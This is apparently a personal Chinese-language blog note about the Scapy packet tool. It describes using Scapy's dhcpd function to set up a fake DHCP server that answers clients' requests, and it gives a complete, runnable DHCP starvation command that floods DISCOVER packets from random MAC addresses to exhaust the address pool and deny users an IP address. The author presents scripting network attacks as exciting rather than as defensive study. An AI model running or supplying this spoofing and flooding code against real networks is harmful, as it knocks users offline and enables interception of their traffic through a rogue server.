没想到在这个工具上花了这么长时间，已经超出了我的安排，主要是这个工具太令人激动了，以后完全可以把网络攻击啥的脚本化了。关于scapy，刚下载了很多很棒的ppt，那里面简直就是宝库啊。不过实在没时间去看了，因为下个月要考RHCE，在学习Python中，不知不觉发现时间过的很快，Linux却落下了。还要交论文，时间根本不够用，所以Scapy就到此为止。把昨天看的一个模拟DHCP Server的小方法写上来

在Scapy中，也自己定义了一个模拟DHCP Server的函数，叫dhcpd，可以从这看出来

>>> dhcp
dhcp6_cls_by_type  dhcp6opts          dhcp6opts_by_code  dhcp6statuscodes   dhcp6types         dhcp_request       dhcpd              dhcpmagic

没错，就是dhcpd了，它模拟了一个dhcp server的守护进程，需要填入几个参数

message-type=offer

server_id #dhcp server ip address

domain

router

name_server

broadcast_address

subnet_mask

renewal_time

lease_time

可以参考dhcp_request()得出的包

server_id=192.168.1.1 lease_time=4855 subnet_mask=255.255.255.0 router=192.168.1.1 name_server=192.168.1.1 end

这样就做好了一个伪装的DHCP服务器。可以骗过dhcp请求

发一个dhcp server拒绝攻击的命令，这个可以获取所有可用的ip地址，导致用户无法正常获取ip地址

>>> conf.checkIPaddr = False
>>> dhcp_discover =  Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=RandString(12,'0123456789abcdef'))/DHCP(options=[("message-type","discover"),"end"])
>>> sendp(dhcp_discover,loop=1)